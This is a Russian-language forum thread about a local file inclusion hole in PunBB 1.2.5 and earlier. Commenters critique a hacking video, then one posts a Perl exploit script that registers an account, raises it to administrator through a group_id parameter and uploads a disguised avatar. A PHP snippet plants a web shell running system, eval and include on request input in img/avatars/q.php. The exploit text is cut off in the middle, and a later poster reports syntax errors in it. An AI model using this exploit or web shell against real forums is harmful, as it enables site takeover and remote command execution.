комментарии ----------------- от меня: видео хорошее, довольно качественное, только 1) нету комментов в архиве 2) зачем выводить содержимое passwd ? можно было сделать чтото поинтереснее ...
мда. Я не знаком с панББ, но если пан_инклуд вставляет в код любой файл, то зачем там были все эти выкрутасы с аваторой ? Не проще было загрузить сразу через фтп или хттп. И тем более если единственной целью был просмотр етс/пассвд, это можно было сделать прямо через этот же файл =\. Странное долгое, неинформативное видео. Пусть автор не обижается, но помойму оно совершенно бесполезно - для скрипткидди, ломающих форум по сплоитам куда проще взять сплоит из обзора этой уязвимости в текстовом формате, а новичку, познающимк веб-хацкерское дело тут не показано абсолютно ничего что обычно можно сделать в таких случаях. Да плюс ко всему комметнариев совсем нет. Лично для меня так и осталось загадкой что такое пан_инклуд. Автор видео что-то куда-то тыкает, бегает мышкой. Не помешало бы по-чаще заглядывать в окно с комментариями для пояснения происходящего !
пан_инклуд может инклудить только локальные файлы, поэтому и надо грузить аватару а passwd я показал просто как пример- ведь уже понятно что можно создать было любой php скрипт а насчет чего-нить поинтереснее заинклудить- то не хотелось палить это кое-что интересное
мой сплоит для punbb <=1.2.5 #!/usr/bin/perl -w use HTTP::Request::Common; use HTTP::Cookies; use LWP; use URI::Escape; #powered by ShAnKaR print "please enter url :"; $url=<STDIN>; chomp($url); $user='ShAnKaR'; $mail='[email protected]'; $file='sh.jpg'; my $ua = LWP::UserAgent->new(agent=>'Mozilla/4.0 (compatible; Windows 5.1)',timeout=>10); $ua->cookie_jar( HTTP::Cookies->new()); $proxy='127.0.0.1:3128';#proxy nax $ua->proxy('http', "http://$proxy/" ); my $req = new HTTP::Request 'POST',$url."register.php?agree=yes"; $data='form_sent=1&req_username='.$user.'&req_password1=password&req_password2=password&timezone=1&req_email1='.$mail.'&email_setting=2&save_pass=1®ister=Register'; $req->content_type('application/x-www-form-urlencoded'); $req->content($data); my $res = $ua->request($req); $res=$ua->get($url."profile.php"); $content=$res->content; $content=~ s!profile.php\?id=(\d+)!$1!g; if($1){ print "Registration complete\n"; my $id=$1; print "user id=".$id."\n"; $req = new HTTP::Request 'POST',$url.'profile.php?section=personal&id='.$id.'&temp[0]=group_id=1'; $data='form_sent=1&form=0&update=Submit'; $req->content_t...,'w+'); fwrite($fd,$text); fclose($fd); ?>
<?php $text='<?php if(isset($cmd))system($cmd); if(isset($eval))eval($eval); if(isset($inc))include($inc); ?>' $fd=fopen('img/avatars/q.php','w+'); fwrite($fd,$text); fclose($fd); ?> Вот у меня именно в этом куске перл ругаеться на то что <> не прально поставлены. цитата из perl: syntax error at C:\EXP.pl line 66, near "$forum_ id" syntax error at C:\EXP.pl line 76, near "$forum_ id" Unterminated <> operator at C:\EXP.pl line 105. На счет "$forum_ id" - там по ходу пробел лишний. А вот с 105 строкой ни как не могу ничего поделать =(
